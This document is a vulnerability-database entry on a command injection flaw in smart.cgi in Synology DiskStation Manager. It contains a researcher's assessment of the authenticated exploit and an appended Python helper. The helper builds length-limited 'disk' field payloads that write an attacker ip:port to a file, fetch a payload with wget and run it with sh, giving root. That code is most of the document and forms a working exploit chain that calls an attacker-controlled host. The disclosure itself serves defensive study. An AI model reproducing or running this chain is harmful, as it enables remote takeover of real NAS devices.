Command injection vulnerability in smart.cgi in Synology DiskStation Manager (DSM) before 5.2-5967-5 allows remote authenticated users to execute arbitrary commands via the disk field.
Recent assessments:
h00die at May 20, 2020 12:19pm UTC reported:
AUTHENTICATED command execution in webman/modules/StorageManager/smart.cgi through either a GET or POST request.
Variables for the request look as such:
'action' => 'apply',
'operation' => 'quick',
'disk' => "/dev/sda"
The disk field is vulnerable. However, that's just where this fun begins. The disk field is required to be 'semi' disk correct. AKA you can't just have nothing there, or a , however /dev/sd did seem to work. Next, when the command is passed off, the entire disk field is limited to 30 characters. After shortening to /dev/sd and then adding ticks ('`') you are left with 22 characters. Pretty tight spacing.
To circumvent this restriction, the following was done:
1. in < 22 characters, echo -n and ip:port to a file (/a).
2. use wget -i /a -O <file> to then pull back shell code from an attacker controlled HTTP server
3. execute the payload
Most likely step 1 will need to be done in > 1 steps.
Exploitation grants root privileges.
Assessed Attacker Value: 5
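The staging sequence the assessment describes, written out as an added example that is not part of the assessment above or of any Metasploit module: a small Python helper that splits ip:port into echo -n writes that each fit the 30-character disk field, then emits the wget and execute steps. The 30-character limit, the /dev/sd prefix and the /a stage file are taken from the post; the download path /tmp/p, running it with sh, and the space inserted before each redirect are assumptions made here. The helper only builds the field values; sending them in the GET/POST request is left to the operator.

```python
"""Build `disk` field values that stage a longer command through a
30-character limit by writing ip:port to a file in pieces, then fetching
and running a payload with wget.  Nothing here touches a device; the
functions only construct and length-check the strings."""

import re

MAX_FIELD_LEN = 30        # limit on the whole disk field (from the post)
DISK_PREFIX = "/dev/sd"   # shortest value the post reports as accepted
STAGE_FILE = "/a"         # file that holds ip:port for wget -i (from the post)
PAYLOAD_PATH = "/tmp/p"   # assumed download location (not in the post)


def command_budget() -> int:
    """Characters left for the command once the prefix and two backticks are in."""
    return MAX_FIELD_LEN - len(DISK_PREFIX) - 2


def wrap(cmd: str) -> str:
    """Embed one shell fragment in the disk field, refusing oversized ones."""
    field = f"{DISK_PREFIX}`{cmd}`"
    if len(field) > MAX_FIELD_LEN:
        raise ValueError(f"{field!r} is {len(field)} chars, limit is {MAX_FIELD_LEN}")
    return field


def stage_file_writes(content: str) -> list[str]:
    """Split `content` into `echo -n` fragments that fit the budget.

    The first write truncates the stage file with '>', later ones append
    with '>>'.  A space is always placed before the redirect: a chunk made
    only of digits written directly before '>' (e.g. `echo -n 8080>>/a`)
    would be parsed by the shell as a file-descriptor number, not text.
    """
    if not re.fullmatch(r"[A-Za-z0-9.:/_-]+", content):
        raise ValueError("stage content must be free of shell metacharacters")
    budget = command_budget()
    cmds: list[str] = []
    pos, first = 0, True
    while pos < len(content):
        redirect = ">" if first else ">>"
        overhead = len("echo -n ") + 1 + len(redirect) + len(STAGE_FILE)
        take = budget - overhead
        if take <= 0:
            raise ValueError("budget too small for even one character per write")
        chunk = content[pos:pos + take]
        cmds.append(f"echo -n {chunk} {redirect}{STAGE_FILE}")
        pos += take
        first = False
    return cmds


def build_chain(ip: str, port: int) -> list[str]:
    """Full ordered list of disk-field values: write ip:port, fetch, execute."""
    steps = stage_file_writes(f"{ip}:{port}")
    steps.append(f"wget -i {STAGE_FILE} -O {PAYLOAD_PATH}")
    steps.append(f"sh {PAYLOAD_PATH}")
    return [wrap(c) for c in steps]


if __name__ == "__main__":
    # Constructed sample listener address; each line is one request's `disk` value.
    for value in build_chain("192.168.1.10", 8080):
        print(f"{len(value):2d}  {value}")
```

With a 17-character ip:port the stage file needs two writes, and every value comes out at or under 30 characters; the wget step alone uses 20 of the 21 available, which is why the post's approach keeps the fetched payload, not the fetch command, as the place where the real work happens.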